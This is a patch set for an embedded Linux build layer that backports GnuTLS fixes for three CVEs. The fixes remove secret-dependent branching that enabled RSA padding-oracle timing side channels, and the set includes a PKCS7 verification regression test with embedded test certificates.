++ "BBgwFoAUhjeO6Uc5imbjOl2I2ltVA27Hu9YwDQYJKoZIhvcNAQELBQADggEBAD+r\n"
++ "i/7FsbG0OFKGF2+JOnth6NjJQcMfM8LiglqAuBUijrv7vltoZ0Z3FJH1Vi4OeMXn\n"
++ "l7X/9tWUve0uFl75MfjDrf0+lCEdYRY1LCba2BrUgpbbkLywVUdnbsvndehegCgS\n"
++ "jss2/zys3Hlo3ZaHlTMQ/NQ4nrxcxkjOvkZSEOqgxJTLpzm6pr7YUts4k6c6lNiB\n"
++ "FSiJiDzsJCmWR9C3fBbUlfDfTJYGN3JwqX270KchXDElo8gNoDnF7jBMpLFFSEKm\n"
++ "MyfbNLX/srh+CEfZaN/OZV4A3MQ0L8vQEp6M4CJhvRLIuMVabZ2coJ0AzystrOMU\n"
++ "LirBWjg89RoAjFQ7bTE=\n"
++ "-----END CERTIFICATE-----\n";
++
++static char ca_pem[] =
++ "-----BEGIN CERTIFICATE-----\n"
++ "MIIDFzCCAf+gAwIBAgIBAjANBgkqhkiG9w0BAQsFADAVMRMwEQYDVQQKDApFeGFt\n"
++ "cGxlIENBMCAXDTE3MDcyMTE0NDQzNFoYDzIyMjIwNzIxMTQ0NDM0WjAiMSAwHgYD\n"
++ "VQQKDBdFeGFtcGxlIGludGVybWVkaWF0ZSBDQTCCASIwDQYJKoZIhvcNAQEBBQAD\n"
++ "ggEPADCCAQoCggEBAKb9ACB8u//sP6MfNU1OsVw68xz3eTPLgKxS0vpqexm6iGVg\n"
++ "ug/o9uYRLzqiEukv/eyz9WzHmY7sqlOJjOFdv92+SaNg79Jc51WHPFXgea4/qyfr\n"
++ "4y14PGs0SNxm6T44sXurUs7cXydQVUgnq2VCaWFOTUdxXoAWkV8r8GaUoPD/klVz\n"
++ "RqxSZVETmX1XBKhsMnnov41kRwVph2C+VfUspsbaUZaz/o/S1/nokhXRACzKsMBr\n"
++ "obqiGxbY35uVzsmbAW5ErhQz98AWJL3Bub1fsEMXg6OEMmPH4AtX888dTIYZNw0E\n"
++ "bUIESspz1kjJQTtVQDHTprhwz16YiSVeUonlLgMCAwEAAaNjMGEwDwYDVR0TAQH/\n"
++ "BAUwAwEB/zAOBgNVHQ8BAf8EBAMCAQYwHQYDVR0OBBYEFPBjxDWjMhjXERirKF9O\n"
++ "o/5Cllc5MB8GA1UdIwQYMBaAFIY3julHOYpm4zpdiNpbVQNux7vWMA0GCSqGSIb3\n"
++ "DQEBCwUAA4IBAQCTm+vv3hBa6lL5IT+Fw8aTxQ2Ne7mZ5oyazhvXYwwfKNMX3SML\n"
++ "W2JdPaL64ZwbxxxYvW401o5Z0CEgru3YFrsqB/hEdl0Uf8UWWJmE1rRa+miTmbjt\n"
++ "lrLNCWdrs6CiwvsPITTHg7jevB4KyZYsTSxQFcyr3N3xF+6EmOTC4IkhPPnXYXcp\n"
++ "248ih+WOavSYoRvzgB/Dip1WnPYU2mfIV3O8JReRryngA0TzWCLPLUoWR3R4jwtC\n"
++ "+1uSLoqaenz3qv3F1WEbke37az9YJuXx/5D8CqFQiZ62TUUtI6fYd8mkMBM4Qfh6\n"
++ "NW9XrCkI9wlpL5K9HllhuW0BhKeJkuPpyQ2p\n"
++ "-----END CERTIFICATE-----\n";
++
++static char ee_pem[] =
++ "-----BEGIN CERTIFICATE-----\n"
++ "MIIDIjCCAgqgAwIBAgIBATANBgkqhkiG9w0BAQsFADAiMSAwHgYDVQQKDBdFeGFt\n"
++ "cGxlIGludGVybWVkaWF0ZSBDQTAgFw0yMjA3MjExNDQ1MzdaGA8yMjIyMDcyMTE0\n"
++ "NDUzN1owFTETMBEGA1UEAwwKSm9obiBTbWl0aDCCASIwDQYJKoZIhvcNAQEBBQAD\n"
++ "ggEPADCCAQoCggEBAMb1uuxppBFY+WVD45iyHUq7DkIJNNOI/JRaybVJfPktWq2E\n"
++ "eNe7XhV05KKnqZTbDO2iYqNHqGhZ8pz/IstDRTZP3z/q1vXTG0P9Gx28rEy5TaUY\n"
++ "QjtD+ZoFUQm0ORMDBjd8jikqtJ87hKeuOPMH4rzdydotMaPQSm7KLzHBGBr6gg7z\n"
++ "g1IxPWkhMyHapoMqqrhjwjzoTY97UIXpZTEoIA+KpEC8f9CciBtL0i1MPBjWozB6\n"
++ "Jma9q5iEwZXuRr3cnPYeIPlK2drgDZCMuSFcYiT8ApLw5OhKqY1m2EvfZ2ox2s9R\n"
++ "68/HzYdPi3kZwiNEtlBvMlpt5yKBJAflp76d7DkCAwEAAaNuMGwwCwYDVR0PBAQD\n"
++ "AgWgMB0GA1UdJQQWMBQGCCsGAQUFBwMCBggrBgEFBQcDBDAdBgNVHQ4EFgQUc+Mi\n"
++ "kr8WMCk00SQo+P2iggp/oQkwHwYDVR0jBBgwFoAU8GPENaMyGNcRGKsoX06j/kKW\n"
++ "VzkwDQYJKoZIhvcNAQELBQADggEBAKU9+CUR0Jcfybd1+8Aqgh1RH96yQygnVuyt\n"
++ "Na9rFz4fM3ij9tGXDHXrkZw8bW1dWLU9quu8zeTxKxc3aiDIw739Alz0tukttDo7\n"
++ "dW7YqIb77zsIsWB9p7G9dlxT6ieUy+5IKk69BbeK8KR0vAciAG4KVQxPhuPy/LGX\n"
++ "PzqlJIJ4h61s3UOroReHPB1keLZgpORqrvtpClOmABH9TLFRJA/WFg8Q2XYB/p0x\n"
++ "l/pWiaoBC+8wK9cDoMUK5yOwXeuCLffCb+UlAD0+z/qxJ2pisE8E9X8rRKRrWI+i\n"
++ "G7LtJCEn86EQK8KuRlJxKgj8lClZhoULB0oL4jbblBuNow9WRmM=\n"
++ "-----END CERTIFICATE-----\n";
++
++static char msg_pem[] =
++ "-----BEGIN PKCS7-----\n"
++ "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\n"
++ "-----END PKCS7-----\n";
++
++const gnutls_datum_t rca_datum = { (void *)rca_pem, sizeof(rca_pem) - 1 };
++const gnutls_datum_t ca_datum = { (void *)ca_pem, sizeof(ca_pem) - 1 };
++const gnutls_datum_t ee_datum = { (void *)ee_pem, sizeof(ee_pem) - 1 };
++const gnutls_datum_t msg_datum = { (void *)msg_pem, sizeof(msg_pem) - 1 };
++
++static void tls_log_func(int level, const char *str)
++{
++ fprintf(stderr, "%s |<%d>| %s", "err", level, str);
++}
++
++#define CHECK(X)\
++{\
++ r = X;\
++ if (r < 0)\
++ fail("error in %d: %s\n", __LINE__, gnutls_strerror(r));\
++}\
++
++void doit(void)
++{
++ int r;
++ gnutls_x509_crt_t rca_cert = NULL;
++ gnutls_x509_crt_t ca_cert = NULL;
++ gnutls_x509_crt_t ee_cert = NULL;
++ gnutls_x509_trust_list_t tlist = NULL;
++ gnutls_pkcs7_t pkcs7 = NULL;
++ gnutls_datum_t data = { (unsigned char *)"xxx", 3 };
++
++ if (debug) {
++ gnutls_global_set_log_function(tls_log_func);
++ gnutls_global_set_log_level(4711);
++ }
++
++ // Import certificates
++ CHECK(gnutls_x509_crt_init(&rca_cert));
++ CHECK(gnutls_x509_crt_import(rca_cert, &rca_datum, GNUTLS_X509_FMT_PEM));
++ CHECK(gnutls_x509_crt_init(&ca_cert));
++ CHECK(gnutls_x509_crt_import(ca_cert, &ca_datum, GNUTLS_X509_FMT_PEM));
++ CHECK(gnutls_x509_crt_init(&ee_cert));
++ CHECK(gnutls_x509_crt_import(ee_cert, &ee_datum, GNUTLS_X509_FMT_PEM));
++
++ // Setup trust store
++ CHECK(gnutls_x509_trust_list_init(&tlist, 0));
++ CHECK(gnutls_x509_trust_list_add_named_crt(tlist, rca_cert, "rca", 3, 0));
++ CHECK(gnutls_x509_trust_list_add_named_crt(tlist, ca_cert, "ca", 2, 0));
++ CHECK(gnutls_x509_trust_list_add_named_crt(tlist, ee_cert, "ee", 2, 0));
++
++ // Setup pkcs7 structure
++ CHECK(gnutls_pkcs7_init(&pkcs7));
++ CHECK(gnutls_pkcs7_import(pkcs7, &msg_datum, GNUTLS_X509_FMT_PEM));
++
++ // Signature verification
++ gnutls_pkcs7_verify(pkcs7, tlist, NULL, 0, 0, &data, 0);
++
++ gnutls_x509_crt_deinit(rca_cert);
++ gnutls_x509_crt_deinit(ca_cert);
++ gnutls_x509_crt_deinit(ee_cert);
++ gnutls_x509_trust_list_deinit(tlist, 0);
++ gnutls_pkcs7_deinit(pkcs7);
++}
+--
+2.25.1
+
diff --git a/meta/recipes-support/gnutls/gnutls/CVE-2023-0361.patch b/meta/recipes-support/gnutls/gnutls/CVE-2023-0361.patch
new file mode 100644
index 0000000000..943f4ca704
--- /dev/null
+++ b/meta/recipes-support/gnutls/gnutls/CVE-2023-0361.patch
@@ -0,0 +1,85 @@
+From 80a6ce8ddb02477cd724cd5b2944791aaddb702a Mon Sep 17 00:00:00 2001
+From: Alexander Sosedkin <asosedkin@redhat.com>
+Date: Tue, 9 Aug 2022 16:05:53 +0200
+Subject: [PATCH] auth/rsa: side-step potential side-channel
+
+Signed-off-by: Alexander Sosedkin <asosedkin@redhat.com>
+Signed-off-by: Hubert Kario <hkario@redhat.com>
+Tested-by: Hubert Kario <hkario@redhat.com>
+Upstream-Status: Backport [https://gitlab.com/gnutls/gnutls/-/commit/80a6ce8ddb02477cd724cd5b2944791aaddb702a
+ https://gitlab.com/gnutls/gnutls/-/commit/4b7ff428291c7ed77c6d2635577c83a43bbae558]
+CVE: CVE-2023-0361
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ lib/auth/rsa.c | 30 +++---------------------------
+ 1 file changed, 3 insertions(+), 27 deletions(-)
+
+diff --git a/lib/auth/rsa.c b/lib/auth/rsa.c
+index 8108ee8..858701f 100644
+--- a/lib/auth/rsa.c
++++ b/lib/auth/rsa.c
+@@ -155,13 +155,10 @@ static int
+ proc_rsa_client_kx(gnutls_session_t session, uint8_t * data,
+ size_t _data_size)
+ {
+- const char attack_error[] = "auth_rsa: Possible PKCS #1 attack\n";
+ gnutls_datum_t ciphertext;
+ int ret, dsize;
+ ssize_t data_size = _data_size;
+ volatile uint8_t ver_maj, ver_min;
+- volatile uint8_t check_ver_min;
+- volatile uint32_t ok;
+
+ #ifdef ENABLE_SSL3
+ if (get_num_version(session) == GNUTLS_SSL3) {
+@@ -187,7 +184,6 @@ proc_rsa_client_kx(gnutls_session_t session, uint8_t * data,
+
+ ver_maj = _gnutls_get_adv_version_major(session);
+ ver_min = _gnutls_get_adv_version_minor(session);
+- check_ver_min = (session->internals.allow_wrong_pms == 0);
+
+ session->key.key.data = gnutls_malloc(GNUTLS_MASTER_SIZE);
+ if (session->key.key.data == NULL) {
+@@ -206,10 +202,9 @@ proc_rsa_client_kx(gnutls_session_t session, uint8_t * data,
+ return ret;
+ }
+
+- ret =
+- gnutls_privkey_decrypt_data2(session->internals.selected_key,
+- 0, &ciphertext, session->key.key.data,
+- session->key.key.size);
++ gnutls_privkey_decrypt_data2(session->internals.selected_key,
++ 0, &ciphertext, session->key.key.data,
++ session->key.key.size);
+ /* After this point, any conditional on failure that cause differences
+ * in execution may create a timing or cache access pattern side
+ * channel that can be used as an oracle, so treat very carefully */
+@@ -225,25 +220,6 @@ proc_rsa_client_kx(gnutls_session_t session, uint8_t * data,
+ * Vlastimil Klima, Ondej Pokorny and Tomas Rosa.
+ */
+
+- /* ok is 0 in case of error and 1 in case of success. */
+-
+- /* if ret < 0 */
+- ok = CONSTCHECK_EQUAL(ret, 0);
+- /* session->key.key.data[0] must equal ver_maj */
+- ok &= CONSTCHECK_EQUAL(session->key.key.data[0], ver_maj);
+- /* if check_ver_min then session->key.key.data[1] must equal ver_min */
+- ok &= CONSTCHECK_NOT_EQUAL(check_ver_min, 0) &
+- CONSTCHECK_EQUAL(session->key.key.data[1], ver_min);
+-
+- if (ok) {
+- /* call logging function unconditionally so all branches are
+- * indistinguishable for timing and cache access when debug
+- * logging is disabled */
+- _gnutls_no_log("%s", attack_error);
+- } else {
+- _gnutls_debug_log("%s", attack_error);
+- }
+-
+ /* This is here to avoid the version check attack
+ * discussed above.
+ */
+--
+2.25.1
+
diff --git a/meta/recipes-support/gnutls/gnutls/CVE-2023-5981.patch b/meta/recipes-support/gnutls/gnutls/CVE-2023-5981.patch
new file mode 100644
index 0000000000..c518cfa0ac
--- /dev/null
+++ b/meta/recipes-support/gnutls/gnutls/CVE-2023-5981.patch
@@ -0,0 +1,206 @@
+Backport of:
+
+From 29d6298d0b04cfff970b993915db71ba3f580b6d Mon Sep 17 00:00:00 2001
+From: Daiki Ueno <ueno@gnu.org>
+Date: Mon, 23 Oct 2023 09:26:57 +0900
+Subject: [PATCH] auth/rsa_psk: side-step potential side-channel
+
+This removes branching that depends on secret data, porting changes
+for regular RSA key exchange from
+4804febddc2ed958e5ae774de2a8f85edeeff538 and
+80a6ce8ddb02477cd724cd5b2944791aaddb702a. This also removes the
+allow_wrong_pms as it was used sorely to control debug output
+depending on the branching.
+
+Signed-off-by: Daiki Ueno <ueno@gnu.org>
+
+Upstream-Status: Backport [https://launchpad.net/ubuntu/+archive/primary/+sourcefiles/gnutls28/3.6.13-2ubuntu1.9/gnutls28_3.6.13-2ubuntu1.9.debian.tar.xz
+Upstream-Commit: https://gitlab.com/gnutls/gnutls/-/commit/29d6298d0b04cfff970b993915db71ba3f580b6d]
+CVE: CVE-2023-5981
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ lib/auth/rsa.c | 2 +-
+ lib/auth/rsa_psk.c | 90 ++++++++++++++++++----------------------------
+ lib/gnutls_int.h | 4 ---
+ lib/priority.c | 1 -
+ 4 files changed, 35 insertions(+), 62 deletions(-)
+
+--- a/lib/auth/rsa.c
++++ b/lib/auth/rsa.c
+@@ -207,7 +207,7 @@ proc_rsa_client_kx(gnutls_session_t sess
+ session->key.key.size);
+ /* After this point, any conditional on failure that cause differences
+ * in execution may create a timing or cache access pattern side
+- * channel that can be used as an oracle, so treat very carefully */
++ * channel that can be used as an oracle, so tread carefully */
+
+ /* Error handling logic:
+ * In case decryption fails then don't inform the peer. Just use the
+--- a/lib/auth/rsa_psk.c
++++ b/lib/auth/rsa_psk.c
+@@ -264,14 +264,13 @@ _gnutls_proc_rsa_psk_client_kx(gnutls_se
+ {
+ gnutls_datum_t username;
+ psk_auth_info_t info;
+- gnutls_datum_t plaintext;
+ gnutls_datum_t ciphertext;
+ gnutls_datum_t pwd_psk = { NULL, 0 };
+ int ret, dsize;
+- int randomize_key = 0;
+ ssize_t data_size = _data_size;
+ gnutls_psk_server_credentials_t cred;
+ gnutls_datum_t premaster_secret = { NULL, 0 };
++ volatile uint8_t ver_maj, ver_min;
+
+ cred = (gnutls_psk_server_credentials_t)
+ _gnutls_get_cred(session, GNUTLS_CRD_PSK);
+@@ -327,71 +326,47 @@ _gnutls_proc_rsa_psk_client_kx(gnutls_se
+ }
+ ciphertext.size = dsize;
+
+- ret =
+- gnutls_privkey_decrypt_data(session->internals.selected_key, 0,
+- &ciphertext, &plaintext);
+- if (ret < 0 || plaintext.size != GNUTLS_MASTER_SIZE) {
+- /* In case decryption fails then don't inform
+- * the peer. Just use a random key. (in order to avoid
+- * attack against pkcs-1 formatting).
+- */
+- gnutls_assert();
+- _gnutls_debug_log
+- ("auth_rsa_psk: Possible PKCS #1 format attack\n");
+- if (ret >= 0) {
+- gnutls_free(plaintext.data);
+- }
+- randomize_key = 1;
+- } else {
+- /* If the secret was properly formatted, then
+- * check the version number.
+- */
+- if (_gnutls_get_adv_version_major(session) !=
+- plaintext.data[0]
+- || (session->internals.allow_wrong_pms == 0
+- && _gnutls_get_adv_version_minor(session) !=
+- plaintext.data[1])) {
+- /* No error is returned here, if the version number check
+- * fails. We proceed normally.
+- * That is to defend against the attack described in the paper
+- * "Attacking RSA-based sessions in SSL/TLS" by Vlastimil Klima,
+- * Ondej Pokorny and Tomas Rosa.
+- */
+- gnutls_assert();
+- _gnutls_debug_log
+- ("auth_rsa: Possible PKCS #1 version check format attack\n");
+- }
+- }
++ ver_maj = _gnutls_get_adv_version_major(session);
++ ver_min = _gnutls_get_adv_version_minor(session);
+
++ premaster_secret.data = gnutls_malloc(GNUTLS_MASTER_SIZE);
++ if (premaster_secret.data == NULL) {
++ gnutls_assert();
++ return GNUTLS_E_MEMORY_ERROR;
++ }
++ premaster_secret.size = GNUTLS_MASTER_SIZE;
+
+- if (randomize_key != 0) {
+- premaster_secret.size = GNUTLS_MASTER_SIZE;
+- premaster_secret.data =
+- gnutls_malloc(premaster_secret.size);
+- if (premaster_secret.data == NULL) {
+- gnutls_assert();
+- return GNUTLS_E_MEMORY_ERROR;
+- }
+-
+- /* we do not need strong random numbers here.
+- */
+- ret = gnutls_rnd(GNUTLS_RND_NONCE, premaster_secret.data,
+- premaster_secret.size);
+- if (ret < 0) {
+- gnutls_assert();
+- goto cleanup;
+- }
+- } else {
+- premaster_secret.data = plaintext.data;
+- premaster_secret.size = plaintext.size;
++ /* Fallback value when decryption fails. Needs to be unpredictable. */
++ ret = gnutls_rnd(GNUTLS_RND_NONCE, premaster_secret.data,
++ premaster_secret.size);
++ if (ret < 0) {
++ gnutls_assert();
++ goto cleanup;
+ }
+
++ gnutls_privkey_decrypt_data2(session->internals.selected_key, 0,
++ &ciphertext, premaster_secret.data,
++ premaster_secret.size);
++ /* After this point, any conditional on failure that cause differences
++ * in execution may create a timing or cache access pattern side
++ * channel that can be used as an oracle, so tread carefully */
++
++ /* Error handling logic:
++ * In case decryption fails then don't inform the peer. Just use the
++ * random key previously generated. (in order to avoid attack against
++ * pkcs-1 formatting).
++ *
++ * If we get version mismatches no error is returned either. We
++ * proceed normally. This is to defend against the attack described
++ * in the paper "Attacking RSA-based sessions in SSL/TLS" by
++ * Vlastimil Klima, Ondej Pokorny and Tomas Rosa.
++ */
++
+ /* This is here to avoid the version check attack
+ * discussed above.
+ */
+-
+- premaster_secret.data[0] = _gnutls_get_adv_version_major(session);
+- premaster_secret.data[1] = _gnutls_get_adv_version_minor(session);
++ premaster_secret.data[0] = ver_maj;
++ premaster_secret.data[1] = ver_min;
+
+ /* find the key of this username
+ */
+--- a/lib/gnutls_int.h
++++ b/lib/gnutls_int.h
+@@ -989,7 +989,6 @@ struct gnutls_priority_st {
+ bool _no_etm;
+ bool _no_ext_master_secret;
+ bool _allow_key_usage_violation;
+- bool _allow_wrong_pms;
+ bool _dumbfw;
+ unsigned int _dh_prime_bits; /* old (deprecated) variable */
+
+@@ -1007,7 +1006,6 @@ struct gnutls_priority_st {
+ (x)->no_etm = 1; \
+ (x)->no_ext_master_secret = 1; \
+ (x)->allow_key_usage_violation = 1; \
+- (x)->allow_wrong_pms = 1; \
+ (x)->dumbfw = 1
+
+ #define ENABLE_PRIO_COMPAT(x) \
+@@ -1016,7 +1014,6 @@ struct gnutls_priority_st {
+ (x)->_no_etm = 1; \
+ (x)->_no_ext_master_secret = 1; \
+ (x)->_allow_key_usage_violation = 1; \
+- (x)->_allow_wrong_pms = 1; \
+ (x)->_dumbfw = 1
+
+ /* DH and RSA parameters types.
+@@ -1141,7 +1138,6 @@ typedef struct {
+ bool no_etm;
+ bool no_ext_master_secret;
+ bool allow_key_usage_violation;
+- bool allow_wrong_pms;
+ bool dumbfw;
+
+ /* old (deprecated) variable. This is used for both srp_prime_bits
+--- a/lib/priority.c
++++ b/lib/priority.c
+@@ -681,7 +681,6 @@ gnutls_priority_set(gnutls_session_t ses
+ COPY_TO_INTERNALS(no_etm);
+ COPY_TO_INTERNALS(no_ext_master_secret);
+ COPY_TO_INTERNALS(allow_key_usage_violation);
+- COPY_TO_INTERNALS(allow_wrong_pms);
+ COPY_TO_INTERNALS(dumbfw);
+ COPY_TO_INTERNALS(dh_prime_bits);
+
diff --git a/meta/recipes-support/gnutls/gnutls/CVE-2024-0553.patch b/meta/recipes-support/gnutls/gnutls/CVE-2024-0553.patch
new file mode 100644
index 0000000000..f15c470879
--- /dev/null
+++ b/meta/recipes-support/gnutls/gnutls/CVE-2024-0553.patch
@@ -0,0 +1,125 @@
+From 40dbbd8de499668590e8af51a15799fbc430595e Mon Sep 17 00:00:00 2001
+From: Daiki Ueno <ueno@gnu.org>
+Date: Wed, 10 Jan 2024 19:13:17 +0900
+Subject: [PATCH] rsa-psk: minimize branching after decryption
+
+This moves any non-trivial code between gnutls_privkey_decrypt_data2
+and the function return in _gnutls_proc_rsa_psk_client_kx up until the
+decryption. This also avoids an extra memcpy to session->key.key.
+
+Signed-off-by: Daiki Ueno <ueno@gnu.org>
+
+Upstream-Status: Backport [https://gitlab.com/gnutls/gnutls/-/commit/40dbbd8de499668590e8af51a15799fbc430595e]
+CVE: CVE-2024-0553
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ lib/auth/rsa_psk.c | 68 ++++++++++++++++++++++++----------------------
+ 1 file changed, 35 insertions(+), 33 deletions(-)
+
+diff --git a/lib/auth/rsa_psk.c b/lib/auth/rsa_psk.c
+index 93c2dc9..c6cfb92 100644
+--- a/lib/auth/rsa_psk.c
++++ b/lib/auth/rsa_psk.c
+@@ -269,7 +269,6 @@ _gnutls_proc_rsa_psk_client_kx(gnutls_session_t session, uint8_t * data,
+ int ret, dsize;
+ ssize_t data_size = _data_size;
+ gnutls_psk_server_credentials_t cred;
+- gnutls_datum_t premaster_secret = { NULL, 0 };
+ volatile uint8_t ver_maj, ver_min;
+
+ cred = (gnutls_psk_server_credentials_t)
+@@ -329,24 +328,48 @@ _gnutls_proc_rsa_psk_client_kx(gnutls_session_t session, uint8_t * data,
+ ver_maj = _gnutls_get_adv_version_major(session);
+ ver_min = _gnutls_get_adv_version_minor(session);
+
+- premaster_secret.data = gnutls_malloc(GNUTLS_MASTER_SIZE);
+- if (premaster_secret.data == NULL) {
++ /* Find the key of this username. A random value will be
++ * filled in if the key is not found.
++ */
++ ret = _gnutls_psk_pwd_find_entry(session, info->username,
++ strlen(info->username), &pwd_psk);
++ if (ret < 0)
++ return gnutls_assert_val(ret);
++
++ /* Allocate memory for premaster secret, and fill in the
